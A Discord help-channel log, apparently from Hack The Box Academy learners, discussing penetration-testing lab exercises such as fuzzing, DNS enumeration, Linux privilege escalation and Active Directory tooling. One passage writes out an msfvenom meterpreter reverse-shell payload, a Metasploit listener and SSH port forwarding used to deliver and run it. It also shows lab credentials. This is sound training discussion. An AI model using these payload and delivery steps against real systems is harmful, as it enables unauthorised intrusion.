@rain saffron that module is above t0 so removing spoilers

one of the ports seems out of place

no luck am still getting a timeout

the flag format will be HTB{50m3_5tr1n6}

so this was actually pretty clever

you only need to use nmap for this exercise

be mindful when you receive a response from a server you may find a status code like 220

Hi

actually the hint says "NMAP may not recognize all information by default"

pushing you to think a bit outside the box

though i'm sure with a specific script type it'd work

oh, my mistake

it's been over a year since i've looked at the module

the section also shows using nc and tcpdump

I got it, thank you 😄

definitely was overthinking lol

nice phonon pic

hey sorry for the tag, but was your podcast recorded, will it get published to spotify like the others ?

it'll be posted probably around May

thanks, are you a fellow under night enjoyer? lol

I was hoping to listen to it before my attempt, oh well

i just happen to know the characters. i play other fg

ah ok nice, uni was my first non-plat fg, so i still play her from time to time, my friend group doesn't really play much uni, so most of my time with FGs is on +R and MBAACC

nice

Anyone can help with this one web attacks with ffuf
" In addition to the directory we found above, there is another directory that can be found. What is it?"

I'm getting all errors

are you using the spawned target?

Yes

I rebooted my Kali

And spawned a new target still nothing

So I'm thinking I'm doing it wrong at this point

ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u 'http://83.136.255.243:52747/FUZZ'

your wordlist is tiny

filter by response code

Thanks it worked
I got the password, how do i interact with the file now To decrypt it and see the contents of it?

Hi

What is this server?

My friend sent it to me

so -mc 200 and do directory-list-2.3-big ?

did you think to ask your friend?

Yes but he didn't respond

Can you tell me

read the server description

Ok

Hey

Where server disruption

did you wait a reasonable amount of time?

Wdym

did you wait 5 minutes

Read the server's name. Then Google - you will now have found out what this server is about

Ok

I wouldn't blindly join a server one of my friends tells me to join without knowing what I am in for beforehand

Is it the case that we should be able to access an instance/target spun up from the academy content, without first connecting to the academy VPN?

I think not, right? 🤷‍♂️

If the IP is public, it is the intended way

If the IP is 10.x.x.x - you must connect to the VPN

👍 Cheers Sparkling

🫡

Lots of 2john, file is a useful command as well

#welcome <--

Already turned it into a hash and cracked it but
How am i supposed to get the contents after cracking the password

You can mount it

You're overthinking the issue

This is a very basic module. Maybe the user can see something they shouldn't

hello I'am a beiggner so please help me in my startup

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

jhello

Hi ! On the Hacking Wordpress - Attacking WordPress Users, it mentions the use of rockyou.txt, in a certain folder. In the PwnBox, I do not have that folder, is that normal ? Am I supposed to get the rockyou.txt file in another way ?

clone seclists

you should have that anyway

Locate rockyou.txt

Thanks ! In the end I just wget rockyou.txt, but I'm gonna try and find it

should be in /usr/share/wordlists

either there or in /opt

one of the pwnbox locations is /opt/useful/seclists/Passwords/Leaked-Databases

Just finished the DNS chapter in the footprinting module, can anyone help me understand why we brute force subdomains for discovered subdomains? Can’t find anything in the chapter talking about it apart from the domain diagram at the top

Because some things are a.b.xyz but we can't directly query for a.b

Or more directly a zone transfer may be prohibited to b

But you can query a.b

Hey is anyone having this issue with the sql injection fudimentals unit? the use a Union injection to get the result of 'user()' I did it and hit submit, and my awnsor went green, but the submit button is now grayed out and it wont let me continue

tried clearing cache and everything plus using a diff browser and it still wont let me continue or complete the section

Bro lost his sub

nope, says im still subscribed to silver

i can hit next and it will go to the next portion but theres no green checkbox on it

also shows i have 40 out of 30 streak pts so thats odd

its like the form is stuck or something super weird

might be add block two secs

yeah nope still wont go through

so weird

Any errors in the dev console?

if you just press shift ctrl R?

looking one sec

tons

Source map error: Error: request failed with status 403
Resource URL: https://academy.hackthebox.com/build/assets/app-e5c4e728.js
Source Map URL: app-e5c4e728.js.map

just one of them

i would post a screenshot but dont seem to be able to lol

Cross-Origin Request Blocked: The Same Origin Policy disallows reading the remote resource at https://api.segment.io/v1/m. (Reason: CORS request did not succeed). Status code: (null).

Error sending segment performance metrics TypeError: NetworkError when attempting to fetch resource. app-e5c4e728.js:7:241
IA https://academy.hackthebox.com/build/assets/app-e5c4e728.js:7
a https://fygapokei.hackthebox.com/htb-anal.js/v1/eLzeD0QoARKZ42pc8AGEUYpcFLpYkf0I/htb-anal.min.js:1
c https://fygapokei.hackthebox.com/htb-anal.js/v1/eLzeD0QoARKZ42pc8AGEUYpcFLpYkf0I/htb-anal.min.js:1

is another

i have a problem with the web requests crud api if i try to use web dev tools i can update london to flag and delete Baltimore but when i retrive flag the country_name is still the same

but if i use curl it works perfectly

or actually i could get it to work in dev tools if i dont update country_name

im on my home connection, gigabit

sounds like social engineering

any htb staff online who could maybe assist?

Hello, I'm Belgian and I'm having some problems with this question because of the language barrier. Can you help me by telling me what I should put, please? for the Information Security Foundations chapter : Learning Process

thanks you

@fathom pendant I'm not sure what's going on here, but this person is telling everyone to DM them lol

yeaaaaaaaah it sounds like social engineering or a bot

new account, telling everyone to dm, super fishy

@gaunt scroll when you're doing the initial axfr query on the domain, you can brute-force each subdomain the query gave you iirc

I'll try that

caution mariana stan is a scammer

you sent me to a group where it asks me to pay by crypto

if anyone can help me

Just do some math, you can also click the hint button

thanks you

rofl my goodness

Trying to scam in a room full of hackers is a very very very bad idea

thats like trying to rob a gun store lol

https://tenor.com/view/fast-guy-fbf-frame-motion-gif-22578154

@ivory quest bye bye scammer

thank you for your reactivity

https://tenor.com/view/the-office-bow-michael-scott-steve-carell-office-gif-12985913

Am I missing something with the whois command?

I cannot find the answer to my question on the module

Gotta be more specific, which module and section?

Information Gathering - Web Edition

I'm typing the whois tesla.com but my output says nothing about admin at all

Section is obviously WHOIS

Hey everyone. I'm doing the MacOS Fundamentals module, and there's a pwnbox, but no Mac VM to go to. Can't answer their questions. Other modules have a machine to jump to. Obviously I'm working off a PC. Am I missing something?

Unfortunately not, you need a Mac machine to go through that module

We cannot virtualise Mac machines due to strict hardware restrictions on operating virtual Mac machines

Good news is so far it's only the first question that I haven't been able to answer. Still going to read through it.

Gotcha, no worries

so I tried all the subdomains again, finally found the one that I could enumerate and got the fqdn.
Here's the rub though, that same subdomain gave me a "transfer failed" message each time I tried to "dig axfr" -- doesn't make sense

it's unclear out of context tbh;
the context becomes more clear when you realize what spoofing is, it's just claiming that your MAC address is something that it's not; which i believe was set up in the section

that's because that subdomain with the sub-sub domain with the answer doesn't allow zone transfers (at least directly)

in a sense, transfer is prohibited

which is why the tool resorts to bruteforcing the subdomains

gtk - what's the best enum for subdomains -- I tried to dig each one

there should be a tool in that module that is useful

also not all wordlists are created equal

Yea, I ran through the entire list of wordlists

should be a fierce wordlist that'll net you results (at least with the bruteforce tool)

but you can create a script that uses nslookup/dig to do the same

also instead of dig axfr just... dig

zone transfers aren't the ONLY way of getting info

yep, i got the fqdn I was looking for

im listening

that's all i have to say on that

🤙

it's not the only query type

i like how it goes from the fundamental to want you to jump into reverse engineering java code that is hard

and on the hint says dont use the tools de obfuscate the code by yourself:)

Usual ARP starts off with a broadcast to get mac addresses to be saved in the routing table, the spoofed one shows that it's possible to just send a falsified record, then force the records to be updated with another request.

i would disagree line 1 and4 are evidence of arp spoofing

but if .101 would have claimed to be AA also and previously been BB that would have been spoofing or the other way around

now sleep GN

yeah, this is not a good example

could have been 1000% better

🤖

Hey everone, I'm working through Active Directory Enumeration & Attacks -> Privileged Access. I'm at the part where Bloodhound is being used for enumerating which servers/workstations a particular user can RDP or WinRM to using the built-in and custom cypher queries.

I ran the SharpHound collector on MS01 two separate times in two separate lab deployments and I can't reproduce the examples where the "Domain Users" group has a CanRDP edge to MS01 or the user forend has a CanWinRM edge to MS01.

Bloodhound just reports "No results match your criteria." This is also preventing me from being able to answer the questions at the end of the section for the same reason. Any ideas?

In the module Footprinting -> Infrastructure Based Enumeration -> Domain section
after we got the company hosted server which we can investigate further why we are running it through shodan
what is the goal to do so

We use it to scan the open ports of any public devices quickly, you could probably do the same with nmap.

In the Module Information Gathering - Web Edition -> Utilising WHOIS.
Q2. What is the admin email contact for the tesla.com domain (also in-scope for the Tesla bug bounty program)?

Now when i run whois tesla.com i cant find a admin email, Is it removed from the records? what was the awnser? or am i missing something

I read the PTT on Linux module and have a question: how are ccache files created? I understand that I may find them on /tmp but how can I create them other then converting from kirbi file?

you can request a service ticket using kvno, a ccache file will be stored in location you specify

it also gets stored when you authenticate to a kerberos server

iirc you can also used memory based credential caching as a fun trick, to keep this ticket entirely in memory

and it dissappears when the process exits

CCACHE is a credential cache file; as the name implies it caches the credentials to prevent exhaustion of typing in credentials over and over again (used in kerberos authentication) so instead of needing to put in a user/pass when you want to connect to a service it first checks "hey is there a cache? or ticket/keytab? no? ok well gonna need to request from server"

https://www.ibm.com/docs/en/pasc/1.1.1?topic=daemons-configuring-cache-file-kerberos-credentials

Thanks for your insight on this but I always overlooked into simple things don’t know why but can you pinpoint how I missed it and what I should do next to get this I have login with user 2 and I have permission to reach /bin/bash but don’t know how to get in there root access

be nosy; inspect things; look for stuff you shouldn't have access to like /root/ 😉 or directories within /root/

Definitely I follow you keep going I also found private key but don’t have right to use it

sure you do; why not copy it over to your machine

I have tried it but still don’t allow me to execute scp or move to root for other options too

i would like to clarify a .ccache is not a keytab, keytabs aren't part of the ccache mechanism

Have you set the right permission on it ? chmod 600 id_rsa

i'm currently stuck at "Getting started" knowledge check
i got the user.txt flag
but unable to escalate to root
i did linenum and found "User www-data may run the following commands on gettingstarted:(ALL : ALL) NOPASSWD: /usr/bin/php"

then tried
www-data@gettingstarted:/usr/bin$ echo 'cat /root/root.txt' | tee -a php
echo 'cat /root/root.txt' | tee -a php
tee: php: Permission denied

The output from linenum implies that the user can run /usr/bin/php as any user (including root) without providing a password. What you are trying to do is overwriting the php binary and that's not going to work 😉

i'm trying to append it to get a reverse shell

by executing it

but it gave me shell to the current user only

any idea on how to go froward with it

That's not going to work. You can't just append something to a binary and expect it to be executed.
If you want to run the php binary as root you'll need to use sudo

i tried sudo

din't work

Hey

if you are still trying to append to the binary, that's not going to work

Eyyy it's Ryuki, I like your blogs...mad respect for the content and the style

also @nova knot:
https://gtfobins.github.io/gtfobins/php/

Has anyone gotten the SocksOverRDP plugin to work in pivoting tunneling and port forwarding module? I am having issues with the plugin, i think it is not running correctly.

i am expecting a popup when i run mstsc.exe that says that the plugin is running, i do not see it.

so when i execute the .exe on the next host it does not work

Hey guys, I have doubt regarding the "Information Gathering - Web Edition" > Utilizing whois - What is the admin email contact for the tesla.com domain (also in-scope for the Tesla bug bounty program)? . I have tried 'whois tesla.com' but didn't got the admin email contact. In the solution the command is correct , then why email is not showing up ??

oh thank you!

i also am trying to ping the 172.16.6.155 client/server from the 2nd pivot host and it is not showing up

Hi im stuck at password attacks hard lab
I got the file i need to mount
I used guestmount to moumt the file at /mnt/vhd but there are no contents in there
What am i doing wrong?

ive spent about 4 hours on this section. I think im going to go try something else. SocksOverRDP seems like it just does not work very well.

Honestly, whois lookups via the commandline tool won't always give you the full results. If you get limited info back, you might want to check online lookups

Yes I set the permission but still not able access

You're having trouble copying the file over to your machine yeah? have you tried encoding it into base64 and decoding it on the attacking machine?

hey everyone

i was gonna ask smth but nvm

I have also checked the online tools but didn't find admin email contact. In the 'whois.com' a link is present in the Administrative Contact Email instead of the email. That link take us to another online whois lookup website. As I have previously mentioned in the solution of that question it is clearly mention that student has to perform 'whois tesla.com | grep "admin" ' to get the answer

write in #1234357888114364508 , I guess something changed

hello lads, i'm doing the JWT Algorithm Confusion section and I'm having difficulties running docker since it's apparently not running. If i'm doing systemctl start docker it asks for some credentials which I have no clue where to find; am I missing something?
I've also tried with sudo before the docker command but the same happens

Very confused

Not at all I used http server and forwarded with ssh and able to send it to my local machine but still asked for password doesn’t work

On my local machine I have the id_rsa but still asking for password

is user2 the target user or the one you currently have access to ?

Sup

going off of this, it sounds like your current user. So you probably want someone else in your ssh command

The user2 is where the flag at and the ask to escalate the privilege of user2 then read the flag there another user user1 the primary user but also still ask for password

it might not be reading the key file correctly, try removing the barrier lines they might be messing up the key

it's probably good to raise the attention in #1234357888114364508 as @urban elk suggested.
If you have not figured the answer out yet, mxtoolbox.com does work

you really need to write more clearly. Punctuation would help. In the previous message of yours that I referred to, it sounded like you already had user2 access, and you were now trying to escalate to root. Now it doesn't sound like that anymore

Sorry guys I never had access to user2 yet

ok, then try 0xW1LD's suggestion to check the key file

(also, no need to run ssh with sudo)

I cat the file and is staring with Beginning and Ending nothing else obviously to remove it out

Guys a question, lets say that you are stuck at a question in any module like I was in filter content curl question for like days on a single question and still was not able to solve it myself. In this kind of situations, is it worth spending hours or even days or just look answer somewhere, understand and move on to next module. Cause I am in InfoSec fundamentals path which is a prequisite for cpts, so I have a lot of modules to cover, this is just a starting point, some people say take your time and some say move on in reddit. Whats your opinion.

Never spend more than 30 mins on a question, if you're stuck just ask

Time management is also a crucial skill for pentesting

and while learning it's ok to ask questions

if you're stuck, google the answer, there's no reward for being stubborn

yeah, what they said, would just add that it's personal so come up with your own threshold for how long is too long. Troubleshooting is also a crucial skill. But even if it's personal I'd find it hard to justify being stuck for more than a couple of hours

also would say it depends on what you're stuck on. Is this something completely new to you ? Definitely normal, don't stay stuck too long, search for answers, note it down, you're learning. Is this something you should know ? Keep trying for a while.

I have raised the issue in #1234357888114364508 also checked mxtoolbox.com but no correct answer found

Guys , anybody completed the 'Information Gathering - Web Edition' can explain me how they have found the answer to the second question "What is the admin email contact for the tesla.com domain (also in-scope for the Tesla bug bounty program)?" under "Utilizing Whois" section.

0x08

something's changed, you used to be able to get it from running whois. You'll have to be patient, or spend some more effort researching it but knowing that this is off-scope from what they're trying to teach you

... well, I guess in a fun kinda way, it's not really

I have no idea what to do right now guys I have removed the key and upload it again to my local machine and cat and there is nothing wrong with it and still asking me for password for both users do you think this is a bug have anyone done this before this module specifically or is there is an other technique I should look into cause I was like maybe two days working on it and I can’t get anywhere. Please let me know if you have use different technique than login with private key so I can look into it without wasting my time anymore. I really appreciate you guys. Thank you so much.

try removing the:

=== BEGIN KEY===

and

=== END KEY===

lines in the key

pem encoded keys literally need those headers

Untill it is resolved I will move forward to next sections 🙂

confirm your public key has a presence on the server

I occasionally have had to remove them to get them to work

you can DM me. Is the answer not accepted or did you not get anything back?

that's rare

not in this case

https://tenor.com/view/phineas-and-ferb-doofenschmirtz-if-i-had-two-nickels-gif-8492318790274198203

Ohhh it's the getting started module... you shouldn't have to ssh as user2 though...

so you do have access as user2...

go back to this

and maybe take a break

I am new to this, so if you have done filter content module in linux fundamentals all the questions after this section are unrelated to that section content, especially the curl one, so I am not supposed to know it but research it. But the thing is it was taking a lot of time and I was getting nowhere so I finally googled the whole question, got the answer and moved on to next section.

But that way I wont learn anything if I google and get answers isnt that correct

Only if you choose not to, if you instead choose to examine the answer, break it appart, learn why it's the answer then you'll still learn something

I did ask and marcilee even helped but said I need to google something simila to not get the direct answer which I tried and didn't get the answer even after alot of time

^ and in case it was something you should have known, think of why you didn't think of it, and how you might next time

when it comes to HTB, this episode is more the exception rather than the rule, from what I can tell. You tend to be given most of the information you need. This particular question is a famous outlier here

so also don't worry too much. It's good that you're asking the question

steal the wheel

Definately I was not supposed to know it, the section didnt even mention anything related to netstat or curl and they are asking me that question. Its like telling me a story and asking me a question from another story from a book in a city library which is completely absurd

They are supposed to be a knwldge check of the section rather than totally different things

yes, it is

but this happens all the time in infosec

having to deal with missing information

i'd recommend you keep notes as a solution to this problem

I am a begenner, I dont know how to deal with this kind of thing, I do keep notes in obsidian

Also is it not possible to share your own notes to other, saw a discussion in cpts about that, I saw academy terms and contitions didn't say anything like that in it

you are sharing your own thing, how can they stpo you from sharing your things to others

the platform considers it "leaking course content"

So I cannot ask somone for their notes even for like examle purpose,so I can know how they are supposed to be. The format and all that

Currently I am giving the whole section to llms and they summarize it for my notes, idk if that is how you are supposed to take notes

Definitely not

Notes are there to suppliment your learning first, and as a reference later

bruh who's deleting

@untold compass we don't do that here, that's against HTB rules

so where do I do

<@&861185840277487616>

one of us will get tired, and it won't be us

where da mods at damn

lunchtime

@storm elk ya the last one I seen active 👀

but thanks 0xW1LD for cleaning up in the meantime, that's gotta suck

How are notes supposed to be, can you show me yours as a refrence

my notes are a mess, you don't want to use em as reference

I have no idea how are thay supposed to be if not llms, like there are bigass sections, llms breakit and summarize

notes are there to help you remember, not to remember for you, if you just pass everything to an LLM that knowledge doesn't go through your brain it just goes straight to the pages

I know its silly but Can somebody please show me how are notes supposed to be. Since giving whole sections to llms is not a good thing to do

I want to know how to do it, any refrence would work

No

I'm pretty sure this says you are user2

Oh yeah I already logged in with user2 but not root yet I’m sorry is stuck on my mind root lol and I can cd to root see the flag but cannot cat it

yeah, so, this is your problem

Yes getting root as user2

no, this was the problem with your attempt to use the private key

Yes definitely the private key did not work in either users

in at least one of your attempts, the one you showed us, you didn't use it right

This one

yep

What is the problem do I need to use my public key to log into it or how is the process?

what is that command doing ?

The command is trying to login with the private key and user2

why are you trying to login as user2 ?

and with someone else's private key ?

The private key is in root directory in the Target so it worked for both users and even though I tried to login with User1 and it didn’t work for some reason and I see the authorized key that does mean they allow access to Target using the private key

you were user1, you became user2, and now you're trying to become root

Hello Everyone
I am doing now this section : https://academy.hackthebox.com/module/158/section/1427 (Remote/Reverse Port Forwarding with SSH)
I did understand first everything , and I applied the exact same procedure that is in the lesson
so first created msfvenom -p windows/x64/meterpreter/reverse_https lhost=172.16.5.129 lport=8080 -f exe -o backupscript.exe
then I did Set Up a Metasploit Listener:
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 0.0.0.0
set lport 8000
run
[*] Started HTTPS reverse handler on https://0.0.0.0:8000

I opened a new terminal and copied the backupscript.exe to the ubuntu pivot machine
scp backupscript.exe ubuntu@10.129.181.18:~/

then I ssh to that pivot ubuntu machine with dynamic port forwarding (not sure why we didn't just use the normal ssh) : ssh -D 9050 ubuntu@10.129.181.18
then I started the Python web server to serve up the msfvenom payload:
python3 -m http.server 8123

(and now here I spend around 4 hours to see how can I do the Invoke-WebRequest in the windows A , but since we don't have the user and pass, then tried a lot of things , at end I was thinking maybe something related to the previous lesson , then I remember the user:victor and pass: pass@123 which is not mentioned in this section , I tried it and it worked , and I loged in to windows A)
then I srtart powershell with Admin mode
run this command :
Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe" (to get the backupscript.exe from ubuntu to windows A) (it shows 200 - in the ubuntu pivot machine which means that the file is downloaded)

then returned back to my host attack, and opened the terminal and run this command so I can get the reverse shell
ssh -R 172.16.5.129:8080:0.0.0.0:8000 ubuntu@10.129.171.18 -vN

and nothing happened , I feel that I did everything correct , but I am missing something here not sure what
Here what I got

The question asked to escalate the privilege from User to

yes, it did, it's what I've been trying to say. So why are you trying to login as user2 with the key that you found

Because SSH a private key give you root access

if it's root's private key, sure. But surely you need to try to login as root, not as user2 ?

That sounds like a good idea let me try that

You need to put that backupscript.exe file on a Windows host, so not the Ubuntu machine. If you enumerate a bit you can identify another host and get it on there to make the whole thing work.

My dear, you are an excellent troubleshooter penetration tester. We got it my friend thank you so much. You save me a lot of time. I never thought about it. I tried to use User2 and User one all the time wow you don’t know how much I appreciate you my friend. Keep up the great work people like you deserve better. This is a team. I am looking for my friend. Thank you so much again.

I already have the file on a Windows host (which is Windows A in the example here)
as I mentioned I logged in to Windows host (Windows A) using proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123
and then opened powershell terminal as an Admin
and run this code
Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe"

Ok, cool, did you then execute the backupscript?

ah !
Here it is
Execute actually no 🤣

let me try

Yeah the idea is, someone runs it or maybe you create a task, etc., but inevitably, someone or thing needs to execute it.

Also, sorry about my initial response. I glanced over your question, but didn't read it completely and just assumed it was what is generally asked about that section.

THIS IS COOOOOOOL
REALLY COOL
I never thought it will work

it is totally fine
I am glad that it works now !

I was thinking actually about executing it , but then I said naaah , maybe we can just follow the lesson

but thanks !

but what is the meaning of logging to the windows A using the passowrd and the username , and then gaining the reverse_shell ?
We already have the shell (powershell as an admin)

or maybe just for us so we learn how thinks works

Could be a means to establish persistence, have a better shell linked to a framework, etc.

Guys hello I didn't understand what is ACADEMY-WINLPE-SRV01? I am passing through Windows Privelege Escalation

I understood this is some kind a server but where is that sever how to log into it?

RDP is not working

Password Attacks
Network Services

I've been running Hydra for the RDP question for the last hour and a half with no results... Am I missing something? Please @ with response, thanks

If you've answered the previous questions, can you possibly enumerate the host and maybe tune your RDP attack?

Yeah I got the previous ones, I'm not how to tune that, but I'll look at it when I can thanks

localgroups?

Guys hello can anyone help me with my question. I am interested where I have to log in? In WIndows Privelege Escalation module?!

What section?

Authenticate to 10.129.39.70 (ACADEMY-WINLPE-SRV01) with user "sql_dev" and password "Str0ng_P@ssw0rd!"

SeImpersonate and SeAssignPrimaryToken

this section

sql_dev so maybe via mssqlclient

mysql you mean?

You can use whatever you think you need to, but I would use mssqlclient.py

do the module prerequisites before the module

I did but don't remember how to use mssqlclient.py shame on me

It has a --help

I am downloading and installing impacket now I didn't have it on my kali as I found now

You probably have it as impacket-mssqlclient

Yo

No I did not as appeared installed it right now

Password Attacks :Password Reuse / Default Passwords -
I don't know what I can do with this assignment

I have Sam's user credentials, but I don't know what to do next.

What have you been doing in the previous Password Attacks sections?

password attacks